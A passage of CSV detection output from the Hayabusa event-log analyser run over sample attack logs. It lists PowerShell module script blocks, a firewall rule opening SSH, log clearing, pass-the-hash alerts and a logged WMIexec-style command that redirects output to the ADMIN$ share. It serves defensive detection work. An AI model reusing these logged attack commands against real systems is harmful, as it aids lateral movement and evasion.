[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.555 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.555 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.556 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.556 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.557 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.683 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.214 +00:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.469 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-NetFirewallRule): ""New-NetFirewallRule"" ParameterBinding(New-NetFirewallRule): name=""Name""; value=""sshd"" ParameterBinding(New-NetFirewallRule): name=""DisplayName""; value=""OpenSSH Server (sshd)"" ParameterBinding(New-NetFirewallRule): name=""Enabled""; value=""True"" ParameterBinding(New-NetFirewallRule): name=""Direction""; value=""Inbound"" ParameterBinding(New-NetFirewallRule): name=""Protocol""; value=""TCP"" ParameterBinding(New-NetFirewallRule): name=""Action""; value=""Allow"" ParameterBinding(New-NetFirewallRule): name=""LocalPort""; value=""22"" ParameterBinding(New-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(New-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(New-NetFirewallRule): name=""Description""; value="""" ParameterBinding(New-NetFirewallRule): name=""Group""; value="""" ParameterBinding(New-NetFirewallRule): name=""LooseSourceMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""LocalOnlyMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(New-NetFirewallRule): name=""Program""; value="""" ParameterBinding(New-NetFirewallRule): name=""Package""; value="""" ParameterBinding(New-NetFirewallRule): name=""Service""; value="""" ParameterBinding(New-NetFirewallRule): name=""LocalUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteMachine""; value="""" ParameterBinding(New-NetFirewallRule): name=""OverrideBlockRules""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(New-NetFirewallRule): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.471 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?sshd"", PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.472 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.475 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:10:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:10:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:10:03.058 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-26 08:25:31.043 +00:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.560 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.560 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.560 +00:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.584 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.584 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.686 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.686 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.852 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.852 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.913 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.913 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_builtin/proc_creation_win_wmiprvse_spawning_process.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.307 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.313 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.325 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.329 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.332 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.335 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.338 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: 